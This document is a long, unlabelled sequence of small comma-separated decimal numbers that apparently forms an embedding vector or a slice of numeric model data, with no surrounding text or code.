-0.012500549666583538, -0.014441896229982376, 0.0020147734321653843, 0.0130234956741333, 0.028453974053263664, 0.013195422478020191, -0.023124225437641144, 0.0317205935716629, 0.053899217396974564, -0.028611574321985245, -0.015459132380783558, 0.03980117663741112, 0.01099618524312973, 0.039142124354839325, -0.023783281445503235, -0.015659714117646217, -0.013073640875518322, -0.03788132220506668, -0.012736950069665909, -0.0016870369436219335, 0.0036588285584002733, 0.0365632139146328, -0.03653455898165703, -0.029198992997407913, 0.025502555072307587, -0.05123434588313103, -0.029571501538157463, -0.011662404052913189, 0.015057968907058239, -0.034127574414014816, -0.01554509624838829, 0.019040951505303383, -0.008159385062754154, -0.0025556280743330717, 0.0042444560676813126, -0.02361135371029377, -0.004054619465023279, -0.012808586470782757, 0.049199871718883514, -0.011289894580841064, 0.006601293105632067, 0.018611133098602295, -0.02968611940741539, -0.011963277123868465, 0.00581687455996871, 0.06470198929309845, 0.02336779050529003, -0.028869464993476868, -0.00035862968070432544, 0.0031394646503031254, -0.013453314080834389, 0.006171474698930979, 0.009348548948764801, -0.00020226086780894548, -0.011175276711583138, 0.02732211910188198, -0.029628809541463852, 0.0009581366903148592, -0.02533062733709812, -0.02788088284432888, 0.014527860097587109, -0.01809535175561905, -0.02576044574379921, 0.0031287192832678556, 0.030689029023051262, 0.003997310530394316, 0.012450404465198517, 0.007930148392915726, -0.028425319120287895, 0.010559204034507275, 0.015430478379130363, 0.028081463649868965, -0.012328622862696648, -0.05513136461377144, -0.029241973534226418, 0.013947605155408382, -0.011168112978339195, -0.003399146720767021, 0.048454854637384415, 0.03908481448888779, 0.01657666079699993, -0.007238856982439756, 0.02713586390018463, -0.019083933904767036, 0.002992610214278102, -0.04077543318271637, -0.030860956758260727, 0.01931316964328289, -0.016376078128814697, -0.017307352274656296, 0.02040204405784607, -0.04146314039826393, -0.0110248401761055, -0.0400017611682415, -0.014363096095621586, -0.009463166818022728, -0.011884476989507675, -0.018897678703069687, 0.008567712269723415, 0.026333536952733994, -0.0075648026540875435, -0.01909826137125492, 0.0074215298518538475, 0.037709396332502365, 0.005802547559142113, 0.02143360674381256, 0.027837900444865227, -0.024041172116994858, -0.021820444613695145, -0.003073201049119234, -0.017493605613708496, -0.011132295243442059, 0.005752401892095804, 0.05180743709206581, -0.03553164750337601, 0.006758893374353647, -0.010609349235892296, 0.0247002262622118, 0.007550475187599659, -0.003391982987523079, 0.020043861120939255, 0.04762387275695801, -0.02921331860125065, -0.0023998189717531204, -0.00794447585940361, 0.027465391904115677, -0.01819564215838909, 0.03280946612358093, 0.009054839611053467, -0.00985716748982668, 0.016891861334443092, -0.0160465519875288, -0.008997530676424503, -0.00806625746190548, 0.005820456426590681, 0.021949389949440956, -0.014663969166576862, -0.0010879776673391461, 0.03616204857826233, 0.016590988263487816, 0.024814845994114876, -0.017808806151151657, 0.017708515748381615, -0.021634189411997795, 0.007930148392915726, -0.013775677420198917, 0.002997982781380415, 0.03696437552571297, -0.008882911875844002, -0.04028830677270889, 0.0067015839740633965, 0.013324368745088577, 0.03223637491464615, -0.007965966127812862, -0.04470110684633255, 0.005039619747549295, -0.01896931603550911, 0.006540402304381132, -0.009914476424455643, -0.02289498969912529, 0.016805896535515785, -0.04255201667547226, -0.011999094858765602, 0.021447934210300446, 0.0070991660468280315, -0.03040248341858387, -0.013675387017428875, -0.021447934210300446, 0.03220771998167038, -0.017020806670188904, 0.004151328932493925, 0.03223637491464615, 0.010831422172486782, 0.007020365912467241, 0.022278916090726852, -0.012572186067700386, 0.004137001466006041, 0.0017228551441803575, -0.018295934423804283, -0.007109911646693945, -0.009262585081160069, 0.0073857116512954235, 0.018639788031578064, -0.021347643807530403, -0.03154866397380829, 0.0075289844535291195, 0.02164851687848568, -0.005397801753133535, -0.025674480944871902, 0.04570401459932327, -0.005344074685126543, 0.022006697952747345, 0.05008816346526146, 0.0050073834136128426, 0.033812373876571655, -0.02212131768465042, -0.0011927458690479398, 0.00987149402499199, -0.03639128431677818, 0.0067374021746218204, 0.013238404877483845, -0.04464379698038101, 0.009792694821953773, 0.014685459434986115, 0.014620986767113209, 0.03002997487783432, -0.007837020792067051, 0.01962837018072605, -0.001948509830981493, -0.0005310047417879105, -0.027107208967208862, 0.042036231607198715, 0.013747023418545723, 0.006959475111216307, -0.01875440590083599, 0.03146270290017128, 0.027923865243792534, 0.02087484300136566, -0.015802986919879913, 0.001236623153090477, 0.00886142160743475, -0.0033042284194380045, -0.027451064437627792, -0.004989474546164274, -0.02775193750858307, 0.01322407741099596, 0.022723061963915825, 0.01984328031539917, 0.013775677420198917, 0.025631500408053398, -0.03335390239953995, -0.009305566549301147, 0.012135203927755356, 0.012063567526638508, 0.022880662232637405, -0.020258771255612373, 0.026920955628156662, 0.046334415674209595, -0.00497514707967639, -0.0025968190748244524, -0.007478838786482811, -0.03186386451125145, -0.03429950401186943, -0.008481748402118683, 0.01090305857360363, -0.02015847899019718, -0.025989681482315063, -0.019198551774024963, 0.0013969095889478922, 0.015802986919879913, -0.02024444378912449, -0.019513752311468124, 0.0057595656253397465, -0.010609349235892296, 0.004878438077867031, -0.011734040454030037, -0.004978728946298361, 0.02230757102370262, -0.040574852377176285, 0.032350994646549225, 0.025430917739868164, 0.006504584103822708, 0.0037250921595841646, 0.006536820437759161, -0.0012599049368873239, -0.0024839916732162237, -0.020488006994128227, -0.011046331375837326, -0.019169896841049194, -0.029571501538157463, 0.02822473645210266, -0.026906628161668777, -0.006261020433157682, 0.0007494956953451037, 0.020502334460616112, -0.01990058831870556, 0.043841470032930374, -0.03421353921294212, -0.04429994150996208, -0.01856815256178379, -0.018797388300299644, -0.0015795823419466615, 0.023539718240499496, -0.004298183135688305, 0.0025645827408879995, 0.04195027053356171, -0.0008860526140779257, -0.004659947007894516, 0.02676335535943508, -0.01613251492381096, -0.031176157295703888, -0.019671352580189705, -0.017078114673495293, 0.015645386651158333, 0.013933277688920498, -0.00903334841132164, -0.0009545548819005489, -0.0006478615687228739, -0.013933277688920498, -0.007815529592335224, -0.04140583425760269, -0.013331531547009945, 0.0029138100799173117, -0.026834990829229355, 0.018711425364017487, -0.007593457121402025, -0.008839930407702923, -0.002713228343054652, 0.004083274397999048, 0.020072516053915024, 0.0051399110816419125, -0.010251167230308056, 0.037365540862083435, 0.021018115803599358, 0.007536148186773062, -0.05255245417356491, 0.023539718240499496, -0.02071724459528923, 0.014047895558178425, -0.013818659819662571, 0.017020806670188904, -0.022937972098588943, -0.0031036464497447014, -0.0053190020844340324, -0.01896931603550911, 0.022565461695194244, 0.012299967929720879, -0.0005444365669973195, -0.011017676442861557, 0.011211094446480274, 0.013295713812112808, -0.0029406738467514515, 0.010501894168555737, -0.027608664706349373, -0.01750793308019638, -0.01538749597966671, 0.018854698166251183, -0.02488648146390915, 0.0017309142276644707, -0.018711425364017487, -0.0005636888090521097, 0.0007221843698062003, -0.005899256560951471, 0.021705826744437218, 0.004770983476191759, 0.0018625460797920823, 0.0012733368203043938, -0.008216693997383118, 0.011676731519401073, -0.002145509934052825, 0.0013431822881102562, 0.013797168619930744, 0.006604874972254038, 0.0036391285248100758, 0.012822913937270641, -0.009656584821641445, 0.015143932774662971, 0.0038003104273229837, 0.016863206401467323, 0.04518823325634003, -0.03189251944422722, -0.004606219939887524, -0.0015733141917735338, 0.015588078647851944, 0.022407863289117813, -0.009613603353500366, 0.015287205576896667, -0.03553164750337601, 0.01891200616955757, -0.016834551468491554, -0.024241754785180092, -0.018209969624876976, 0.04796772450208664, -0.014148186892271042, -0.003042755648493767, -0.028138773515820503, -0.008080584928393364, 0.023697316646575928, -0.019227206707000732, -0.025058409199118614, 0.007331984583288431, 0.0038719468284398317, -0.015588078647851944, -0.038139212876558304, -0.008531893603503704, -0.009584948420524597, -0.03604743257164955, 0.0347006656229496, -0.030459793284535408, 0.01141884084790945, -0.02043069899082184, -0.008381457068026066, 0.02921331860125065, 0.012916040606796741, 0.014262804761528969, 0.006744565907865763, 0.009377202950417995, -0.011289894580841064, 0.020502334460616112, 0.015244223177433014, -0.016003569588065147, -0.009176621213555336, 0.0077797118574380875, -0.05375594645738602, 0.002267291769385338, -0.02336779050529003, 0.025674480944871902, 0.018338914960622787, 0.019771642982959747, 0.011640912853181362, -0.012414585798978806, 0.018367569893598557, -0.006619202438741922, -0.0075289844535291195, -0.014492041431367397, 0.01151196751743555, -0.00001572642577229999, 0.005480183754116297, -0.004434292670339346, 0.04911390691995621, 0.009334221482276917, -0.014226987026631832, -0.0070884209126234055, -0.019012298434972763, -0.03650590404868126, -0.012493385933339596, -0.011726876720786095, 0.006852020509541035, 0.0029764920473098755, 0.00894022174179554, 0.02915601059794426, 0.04183565080165863, -0.010043421760201454, 0.0034367558546364307, -0.010501894168555737, -0.0028385918121784925, -0.011132295243442059, -0.0030051465146243572, 0.013969095423817635, -0.012744113802909851, 0.03639128431677818, 0.018883351236581802, -0.012192513793706894, 0.00847458466887474, 0.016490695998072624, -0.0039041831623762846, -0.012092222459614277, -0.014226987026631832, 0.024428008124232292, 0.00035571944317780435, -0.022852007299661636, -0.02485782653093338, 0.011554949916899204, 0.013016331940889359, -0.0026057737413793802, -0.026089973747730255, -0.005372729152441025, -0.032780811190605164, 0.03965790569782257, 0.023195862770080566, 0.0009841049322858453, 0.009198112413287163, -0.02541659027338028, 0.027293464168906212, 0.012292804196476936, -0.043841470032930374, -0.0040259649977087975, -0.04080408811569214, -0.01342465914785862, -0.0233964454382658, 0.008496075868606567, 0.021705826744437218, -0.041004668921232224, -0.014613823033869267, 0.04229412227869034, 0.01899797096848488, 0.004086855798959732, -0.03599012270569801, -0.012242658995091915, 0.0008838139474391937, -0.009620767086744308, 0.004591892473399639, 0.009011858142912388, -0.008746802806854248, 0.0037107649259269238, -0.018267279490828514, 0.0347006656229496, 0.01944211684167385, -0.01915557123720646, 0.05086183547973633, 0.03323928266763687, -0.006031783763319254, -0.00421221973374486, -0.03765208646655083, -0.022450843825936317, 0.00939153041690588, -0.03968656063079834, 0.005841947626322508, -0.002303109969943762, 0.029084373265504837, 0.0018446369795128703, 0.01657666079699993, -0.020330406725406647, -0.009420185349881649, 0.030230555683374405, -0.02588939107954502, -0.0403742678463459, 0.02454262599349022, -0.011719712987542152, 0.0015831642085686326, -0.009957457892596722, 0.005720165558159351, 0.00031363306334242225, 0.010766949504613876, -0.006905748043209314, -0.018453534692525864, -0.020043861120939255, -0.008481748402118683, -0.036677829921245575, -0.04028830677270889, -0.015903279185295105, 0.016906186938285828, 0.012579349800944328, -0.02700691856443882, -0.020860515534877777, 0.007213784381747246, 0.011032003909349442, -0.014606659300625324, -0.015831641852855682, 0.0027759100776165724, 0.001957464264705777, -0.005204383749514818, 0.003499437589198351, -0.028368009254336357, -0.026032663881778717, 0.018668442964553833, -0.021763134747743607, -0.00724960258230567, -0.00814505759626627, -0.0040259649977087975, -0.0007351684616878629, 0.031691938638687134, -0.021820444613695145, -0.013095132075250149, 0.025903718546032906, 0.03332524746656418, -0.007915820926427841, -0.016648296266794205, -0.020488006994128227, -0.017049459740519524, -0.004473692271858454, 0.04444321617484093, 0.040918704122304916, 0.02747971937060356, -0.020287426188588142, 0.011347204446792603, -0.01753658801317215, -0.029600156471133232, -0.0049250018782913685, 0.02429906278848648, -0.011891640722751617, 0.00617505656555295, 0.030259210616350174, -0.023597026243805885, -0.011232585646212101, -0.008603530004620552, -0.0005260797333903611, 0.041004668921232224, -0.004523837938904762, -0.029600156471133232, -0.030201900750398636, 0.011827168054878712, 0.006275347899645567, -0.017765823751688004, 0.027680300176143646, 0.0026648736093193293, 0.007253184448927641, -0.006952311377972364, 0.009520475752651691, -0.01217818632721901, -0.03960059583187103, -0.01881171576678753, 0.03220771998167038, 0.006504584103822708, -0.042723942548036575, 0.01485738717019558, 0.00441638333722949, -0.005516001954674721, -0.018711425364017487, -0.017336005344986916, -0.0130234956741333, 0.01984328031539917, 0.029514191672205925, -0.04280990734696388, -0.009914476424455643, -0.026777682825922966, -0.01174120418727398, 0.02292364463210106, 0.02090349793434143, 0.02790953777730465, -0.035588957369327545, 0.017149752005934715, -0.015301533043384552, 0.008696657605469227, -0.00569151109084487, 0.019083933904767036, 0.010380112566053867, -0.022937972098588943, 0.021046770736575127, 0.0011103639844805002, -0.0005139911081641912, 0.004860529210418463, 0.005129165481775999, 0.004896347410976887, -0.013009168207645416, -0.03220771998167038, 0.028611574321985245, -0.01676291413605213, -0.00681262044236064, 0.018740078434348106, 0.03742285072803497, 0.004760237876325846, -0.034901250153779984, -0.0018016551621258259, -0.0054730200208723545, 0.02937091886997223, 0.016648296266794205, -0.02018713392317295, -0.009434512816369534, -0.019800297915935516, 0.029113028198480606, 0.0030212646815925837, 0.04624845087528229, -0.009964621625840664, 0.0034385465551167727, -0.006350565701723099, 0.0007194979698397219, -0.020917825400829315, 0.0010763367172330618, -0.02233622595667839, -0.014527860097587109, -0.03570357710123062, -0.00803760252892971, -0.015817314386367798, -0.024628590792417526, 0.00025789099163375795, 0.004226546734571457, 0.00013241538545116782, -0.002666664542630315, -0.009563458152115345, 0.00891156680881977, 0.04180699586868286, -0.018453534692525864, -0.012278476729989052, 0.024127135053277016, -0.015100950375199318, 0.03621935844421387, 0.010021930560469627, -0.013926113955676556, -0.012729786336421967, -0.0064078751020133495, -0.0017613597447052598, -0.01974298804998398, 0.013775677420198917, -0.03968656063079834, 0.024628590792417526, -0.0005117524415254593, -0.01607520505785942, -0.004029546864330769, -0.007915820926427841, -0.019241534173488617, -0.016204150393605232, 0.008567712269723415, -0.013116623274981976, -0.0032057284843176603, -0.020287426188588142, 0.028611574321985245, 0.06963057070970535, -0.02236488088965416, -0.010723967105150223, -0.005086183547973633, 0.008933058008551598, 0.009835676290094852, 0.013453314080834389, 0.013016331940889359, -0.031691938638687134, 0.010910222306847572, 0.017178406938910484, -0.010150875896215439, -0.0013825823552906513, 0.03137673810124397, 0.010351458564400673, -0.003651664825156331, -0.016648296266794205, -0.009441675618290901, 0.024972444400191307, -0.028267718851566315, 0.021634189411997795, -0.0020720825996249914, 0.014269968494772911, -0.019327497109770775, 0.03157731890678406, 0.002544882707297802, -0.016003569588065147, -0.030201900750398636, -0.011483313515782356, 0.00010023498180089518, -0.0027759100776165724, 0.01099618524312973, 0.0026272644754499197, -0.018883351236581802, 0.002648755442351103, -0.0037788194604218006, 0.018697097897529602, 0.012278476729989052, -0.022751716896891594, -0.009420185349881649, -0.010315639898180962, -0.009556294418871403, -0.011734040454030037, -0.002365791704505682, 0.0016324141761288047, -0.02560284547507763, 0.03464335948228836, 0.002863664645701647, -0.03143404796719551, 0.006110583897680044, 0.0011229004012420774, -0.006540402304381132, 0.009642258286476135, 0.009685239754617214, 0.005408547352999449, 0.012650986202061176, 0.013453314080834389, -0.010723967105150223, -0.013818659819662571, -0.008410112001001835, -0.015874624252319336, 0.014055059291422367, -0.026749027892947197, -0.007471675518900156, 0.008359966799616814, 0.00010728668712545186, -0.03682110458612442, 0.009169457480311394, -0.013524950481951237, 0.015143932774662971, -0.0005623456672765315, 0.026032663881778717, -0.0024177280720323324, -0.020760225132107735, 0.0027669554110616446, 0.02186342515051365, 0.026276227086782455, 0.02432771772146225, -0.018668442964553833, -0.006504584103822708, 0.04086139798164368, 0.013890296220779419, 0.00285829184576869, 0.025631500408053398, -0.010530549101531506, 0.04401339590549469, -0.02790953777730465, -0.009685239754617214, -0.02193506248295307, 0.014570841565728188, -0.004785310942679644, 0.010129385627806187, 0.0017318096943199635, -0.00016420402971561998, 0.042723942548036575, 0.012264150194823742, 0.011067821644246578, -0.0011685686185956001, -0.016590988263487816, -0.0092339301481843, 0.002738300943747163, -0.021347643807530403, 0.012077894993126392, 0.00032773648854345083, 0.0031699102837592363, -0.0036355466581881046, 0.0045704017393291, 0.0025395099073648453, 0.008188039064407349, -0.01054487656801939, -0.044586487114429474, -0.009606439620256424, 0.014757095836102962, 0.0043877288699150085, -0.01071680337190628, 0.003529882989823818, 0.0008663525804877281, 0.004606219939887524, 0.0015151096740737557, -0.02361135371029377, -0.005000220146030188, -0.02650546468794346, 0.032408300787210464, 0.007722402922809124, -0.0016297278925776482, 0.0041334195993840694, 0.0004875751619692892, 0.00210610986687243, 0.023410771042108536, 0.02058829739689827, 0.045245543122291565, 0.00016666653391439468, 0.004412801470607519, -0.01819564215838909, 0.019040951505303383, -0.04243739694356918, 0.016218477860093117, 0.004824711009860039, -0.003961492329835892, 0.0015088414074853063, -0.010007603093981743, 0.007650766521692276, 0.03573223203420639, 0.025588518008589745, -0.023339135572314262, -0.0007409888785332441, 0.018553825095295906, -0.01594625972211361, 0.01576000638306141, 0.027966845780611038, -0.006561893038451672, -0.036305323243141174, 0.01894066110253334, 0.033096011728048325, -0.004702928941696882, 0.00042847514851018786, 0.008761130273342133, -0.022852007299661636, 0.004957238212227821, 0.004763819742947817, 0.004760237876325846, 0.007324820850044489, 0.023181535303592682, -0.005952984094619751, -0.016992151737213135, 0.03398430347442627, 0.013159604743123055, -0.02775193750858307, -0.007872839458286762, -0.009678076021373272, 0.02408415451645851, -0.008983203209936619, 0.007224529981613159, 0.02071724459528923, 0.00822385773062706, -0.0035263013560324907, 0.012966186739504337, 0.013310041278600693, 0.029198992997407913, -0.0258177537471056, 0.004957238212227821, 0.024585608392953873, 0.01819564215838909, -0.003184237517416477, 0.00886142160743475, -0.04788176342844963, 0.002055964432656765, 0.018768733367323875, -0.010673821903765202, 0.022264590486884117, 0.002321019070222974, 0.04504496231675148, -0.016175497323274612, -0.010645166970789433, 0.001173941302113235, -0.016562333330512047, -0.006393547635525465, -0.024958118796348572, -0.006508165970444679, 0.0160465519875288, 0.012550695799291134, -0.009921640157699585, -0.014886041171848774, 0.01657666079699993, 0.00031676716753281653, -0.015244223177433014, -0.004649201408028603, 0.0029818646144121885, 0.010924549773335457, 0.0026899464428424835, 0.0008918730309233069, -0.011626586318016052, 0.0039185103960335255, -0.01286589540541172, -0.021748807281255722, 0.02114706113934517, -0.0019055278971791267, -0.010043421760201454, 0.0171640794724226, 0.019399134442210197, 0.0017568824114277959, 0.023468080908060074, 0.010967531241476536, 0.01881171576678753, -0.007009620778262615, 0.02523033693432808, 0.027522699907422066, -0.03762343153357506, -0.002562791807577014, -0.0064795115031301975, -0.031663283705711365, -0.014348768629133701, -0.031233465299010277, 0.0074931662529706955, -0.014427568763494492, -0.002163419034332037, 0.0038468739949166775, -0.0073140752501785755, 0.007536148186773062, -0.02968611940741539, 0.021476589143276215, -0.012436076998710632, -0.00926974881440401, 0.0028368011116981506, 0.020803207531571388, -0.00028184440452605486, -0.00985716748982668, -0.002888737479224801, -0.02429906278848648, 0.013087968342006207, -0.009212439879775047, -0.0130234956741333, -0.022078335285186768, 0.002124018967151642, -0.016805896535515785, 0.01825295202434063, 0.024900808930397034, -0.005999547429382801, 0.025502555072307587, 0.0016145050758495927, 0.013188258744776249, -0.011117967776954174, -0.01199193112552166, 0.011762695387005806, -0.022450843825936317, 0.037766702473163605, 0.00031788647174835205, -0.011304222047328949, -0.0010817095171660185, -0.004448619671165943, 0.019270189106464386, -0.004147747065871954, 0.013181095942854881, -0.017464952543377876, -0.0074215298518538475, 0.016777241602540016, 0.0029335101135075092, -0.020659934729337692, -0.00042825128184631467, -0.0002505035081412643, -0.012937531806528568, 0.04404205083847046, -0.00018244892999064177, -0.010279822163283825, 0.01034429483115673, -0.05040336400270462, -0.040259651839733124, -0.008137893863022327, 0.02252248115837574, -0.009448839351534843, -0.002652337308973074, -0.0027490463107824326, -0.006071183830499649, -0.018954988569021225, 0.022135643288493156, 0.012285640463232994, -0.01782313361763954, 0.009355712682008743, -0.016734261065721512, 0.0021526734344661236, 0.0008891866891644895, 0.04106197878718376, 0.036993030458688736, 0.0036086831241846085, -0.013009168207645416, 0.020330406725406647, -0.02647680975496769, -0.009642258286476135, 0.019427789375185966, -0.023811936378479004, 0.011999094858765602, 0.001590327825397253, 0.009147967211902142, -0.004724419675767422, 0.004548910539597273, -0.020674262195825577, 0.002011191565543413, -0.0030141009483486414, -0.005480183754116297, 0.009993276558816433, 0.003010519314557314, -0.0028565009124577045, -0.050603944808244705, -0.01518691424280405, -0.002992610214278102, 0.018324587494134903, 0.011662404052913189, 0.0004938433412462473, -0.010487567633390427, -0.03707899525761604, 0.020416371524333954, 0.004466529004275799, 0.0479104183614254, -0.0042444560676813126, -0.002638010075315833, -0.009721058420836926, 0.015874624252319336, 0.029198992997407913, 0.004921420011669397, 0.012292804196476936, -0.031319428235292435, 0.03553164750337601, -0.001729123294353485, 0.0141410231590271, 0.014406077563762665, 0.00987149402499199, -0.00303738284856081, -0.0013073640875518322, 0.009742548689246178, -0.0041692377999424934, -0.0061929658986628056, 0.011583603918552399, -0.0034689921885728836, 0.013603750616312027, -0.012966186739504337, 0.0037788194604218006, -0.003897019661962986, 0.024528300389647484, 0.02697826363146305, -0.013567931950092316, -0.008388620801270008, 0.019914915785193443, -0.012314295396208763, 0.00044168310705572367, 0.01330287754535675, -0.007614948321133852, 0.009062003344297409, 0.018353242427110672, -0.0026648736093193293, -0.002691737376153469, -0.00714931171387434, 0.011497640050947666, 0.004094019532203674, 0.004907092545181513, -0.0006398024852387607, 0.013324368745088577, 0.019169896841049194, -0.028052810579538345, -0.012092222459614277, 0.02364000864326954, 0.01501498743891716, 0.0019180643139407039, -0.0025753281079232693, -0.012658149935305119, -0.018611133098602295, 0.004147747065871954, -0.006221620365977287, 0.0006398024852387607, -0.008087748661637306, -0.029972665011882782, 0.013603750616312027, -0.0012079685693606734, 0.013904622755944729, 0.028239063918590546, -0.017450625076889992, 0.01325273234397173, -0.008094912394881248, 0.005917165894061327, -0.02305258996784687, 0.013073640875518322, 0.02374029904603958, -0.010122221894562244, 0.005082601681351662, 0.01362524088472128, 0.01713542453944683, 0.014871714636683464, -0.004799637943506241, -0.013288550078868866, 0.027737610042095184, -0.0029639555141329765, 0.010143713094294071, 0.008166548795998096, 0.0008368025883100927, -0.02310989983379841, -0.030574411153793335, 0.010774113237857819, 0.0039901467971503735, 0.013875968754291534, 0.0011596140684559941, -0.006501002237200737, 0.007102747913450003, -0.02159120701253414, -0.045245543122291565, -0.019642697647213936, 0.019384806975722313, -0.014843059703707695, 0.0009832094656303525, -0.01007923949509859, -0.0017264370108023286, -0.02055964432656765, 0.005089765414595604, 0.007138566114008427, 0.02239353582262993, -0.013747023418545723, 0.02551688253879547, 0.009262585081160069, -0.029241973534226418, -0.021849099546670914, -0.0022386370692402124, 0.0010145503329113126, 0.01875440590083599, -0.017092442139983177, -0.007643602788448334, 0.0014049686724320054, -0.0065941293723881245, -0.012600841000676155, -0.01928451657295227, -0.003965074196457863, -0.023625681176781654, 0.011748367920517921, 0.030287865549325943, 0.0025878646411001682, -0.011067821644246578, 0.028181755915284157, 0.008589203469455242, -0.02896975539624691, 0.009248257614672184, 0.008918730542063713, -0.011676731519401073, 0.002831428311765194, 0.005945820361375809, -0.013539277948439121, 0.013116623274981976, -0.0010942458175122738, 0.03077499195933342, -0.010989022441208363, -0.0016574868932366371, 0.02482917159795761, -0.017020806670188904, -0.016118187457323074, 0.009441675618290901, -0.011648076586425304, 0.007543311920017004, 0.001523168757557869, 0.012400259263813496, -0.012772767804563046, -0.017622550949454308, -0.01442040503025055, -0.01325273234397173, -0.00967091228812933, 0.016863206401467323, 0.006178638432174921, -0.010408767499029636, 0.007263930048793554, -0.010401603765785694, 0.012128040194511414, 0.003857619594782591, -0.015459132380783558, 0.012056403793394566, -0.002867246512323618, -0.01401924155652523, -0.0037465831264853477, -0.004559656139463186, -0.0062287840992212296, 0.022536808624863625, 0.013353022746741772, 0.005931492894887924, 0.040632158517837524, 0.006604874972254038, -0.01018669456243515, 0.00617505656555295, -0.01079560350626707, -0.0017022596439346671, 0.009957457892596722, 0.012342949397861958, -0.009792694821953773, -0.00954913068562746, 0.002321019070222974, -0.00995029415935278, -0.018869025632739067, 0.0009093343978747725, -0.012378768064081669, -0.0076722572557628155, 0.0012294595362618566, 0.0064544384367764, 0.013883132487535477, -0.01375418622046709, 0.005806129425764084, -0.025301972404122353, -0.01306647714227438, 0.013575095683336258, 0.01894066110253334, -0.006350565701723099, -0.027207501232624054, -0.0009079912560991943, 0.011289894580841064, 0.006350565701723099, -0.0041334195993840694, -0.014943351037800312, -0.0017541961278766394, -0.002199237234890461, 0.00015245118993334472, -0.014900368638336658, -0.009756876155734062, -0.007414366118609905, -0.004430710803717375, 0.018883351236581802, -0.015043641440570354, 0.009943130426108837, -0.018367569893598557, 0.01038727629929781, -0.014148186892271042, 0.007210202515125275, 0.01294469553977251, 0.009821348823606968, -0.0018786642467603087, -0.005824038293212652, 0.0086751664057374, -0.01841055229306221, 0.007306911516934633, -0.003562119323760271, -0.009133639745414257, 0.0025645827408879995, -0.021949389949440956, -0.011927458457648754, 0.014871714636683464, 0.012808586470782757, -0.0052473656833171844, -0.008259675465524197, 0.012844404205679893, 0.0038289648946374655, -0.014771423302590847, 0.02517302706837654, 0.02186342515051365, 0.010279822163283825, 0.019298844039440155, -0.004151328932493925, 0.009713894687592983, 0.005892092827707529, -0.026276227086782455, 0.007102747913450003, 0.0076865847222507, 0.009026184678077698, 0.01419116836041212, 0.0015580914914608002, -0.023969536647200584, 0.01682022400200367, -0.0085820397362113, 0.001595700508914888, 0.006941566243767738, -0.0011229004012420774, 0.019270189106464386, -0.023324808105826378, -0.016017897054553032, 0.007020365912467241, -0.036248013377189636, 0.014133859425783157, -0.006031783763319254, -0.022106990218162537, -0.005981638561934233, 0.012873059138655663, 0.0071349842473864555, -0.024556953459978104, 0.005605547223240137, -0.01891200616955757, -0.02255113609135151, -0.014320113696157932, -0.013775677420198917, 0.008324148133397102, 0.0014900368405506015, -0.0039901467971503735, 0.01099618524312973, -0.009506149217486382, -0.00742869358509779, -0.007837020792067051, -0.002494737273082137, 0.02071724459528923, -0.006139238364994526, -0.021634189411997795, -0.012192513793706894, 0.025344954803586006, -0.01406222302466631, -0.006626366171985865, 0.007163638714700937, 0.004072528798133135, -0.009291240014135838, 0.008481748402118683, -0.0020219371654093266, -0.013897459022700787, -0.02411280758678913, 0.014957677572965622, 0.011239749379456043, -0.008589203469455242, -0.0028869465459138155, -0.01294469553977251, 0.020731570199131966, 0.02106109820306301, -0.02753702737390995, -0.003972237929701805, 0.015358841978013515, 0.012686804868280888, 0.004839038010686636, 0.01502931397408247, 0.0303738284856081, 0.006013874895870686, 0.0358181931078434, 0.017636878415942192, -0.025216009467840195, 0.02472888119518757, 0.004599056206643581, -0.01697782427072525, 0.00033982511376962066, -0.024069827049970627, 0.008625021204352379, -0.0011551367351785302, 0.001706736977212131, 0.031061537563800812, 0.004255201667547226, -0.0012760232202708721, 0.0053548202849924564, 0.01146182231605053, 0.009814185090363026, -0.007066929712891579, 0.0014488459564745426, 0.0027042736764997244, -0.014320113696157932, 0.0166053157299757, -0.004104765132069588, -0.0130234956741333, 0.0006957684527151287, 0.013016331940889359, 0.003506601322442293, -0.025402262806892395, 0.021376298740506172, 0.0023711645044386387, 0.009620767086744308, -0.015115277841687202, 0.02090349793434143, 0.00921960361301899, 0.013166768476366997, -0.000046479704906232655, 0.0006792024942114949, -0.02345375344157219, 0.022823354229331017, -0.015129605308175087, 0.00397940119728446, 0.007801202591508627, -0.011927458457648754, 0.0074573480524122715, 0.003821801394224167, 0.007808366324752569, -0.01010789442807436, -0.0036176375579088926, 0.008123566396534443, -0.00044145924039185047, -0.015344514511525631, 0.0018303097458556294, 0.01501498743891716, -0.007041857112199068, 0.015201241709291935, 0.01629011519253254, -0.0065511479042470455, 0.009935966692864895, 0.004129837732762098, 0.0008641139138489962, -0.03444277495145798, -0.007622111588716507, 0.007145729847252369, 0.005809711292386055, -0.002804564544931054, -0.0043160924687981606, -0.0046026380732655525, 0.0018338916124776006, 0.010559204034507275, 0.00036489785998128355, 0.011719712987542152, 0.007894329726696014, 0.0011488685850054026, 0.02196371741592884, -0.00037877741851843894, 0.021892080083489418, -0.021190043538808823, 0.00044481721124611795, -0.00911214854568243, -0.0017909096786752343, 0.016032224521040916, 0.006751729641109705, -0.012407422997057438, 0.018052369356155396, -0.004072528798133135, 0.006805457174777985, -0.001312736771069467, 0.02557419054210186, -0.01074545830488205, -0.0016118187922984362, 0.004341165069490671, -0.005884929560124874, -0.022064007818698883, -0.018295934423804283, -0.007951639592647552, 0.008137893863022327, 0.02336779050529003, 0.013396005146205425, -0.025803428143262863, -0.000022736157916369848, -0.008359966799616814, 0.0032146829180419445, -0.022465171292424202, -0.007650766521692276, 0.006669347640126944, 0.03252292051911354, -0.002109691733494401, 0.0022780371364206076, 0.0008753071306273341, 0.009133639745414257, 0.012779931537806988, -0.02653411775827408, 0.0024445918388664722, -0.024026844650506973, 0.012321459129452705, -0.0184678602963686, 0.011189604178071022, -0.0026004009414464235, -0.00363733759149909, 0.009842840023338795, -0.011920294724404812, -0.0007566593703813851, -0.001993282465264201, -0.0005901047261431813, -0.021906407549977303, -0.010860076174139977, 0.012650986202061176, 0.025588518008589745, 0.029829392209649086, 0.005619874689728022, 0.008059093728661537, 0.004806801676750183, -0.015344514511525631, -0.00686992984265089, -0.01163374911993742, 0.0033042284194380045, 0.006160729564726353, 0.03673513978719711, 0.008231021463871002, -0.0021437190007418394, -0.01694916933774948, 0.015516442246735096, -0.03438546508550644, 0.006751729641109705, -0.004187147133052349, -0.018209969624876976, -0.0035460011567920446, -0.009463166818022728, 0.00931273028254509, 0.03223637491464615, 0.018682770431041718, -0.010458912700414658, 0.007794039323925972, 0.005469438154250383, -0.006776802241802216, 0.010595021769404411, 0.0099073126912117, -0.016118187457323074, -0.00294783734716475, -0.022508153691887856, -0.002369373571127653, -0.006071183830499649, 0.012873059138655663, 0.006526074837893248, 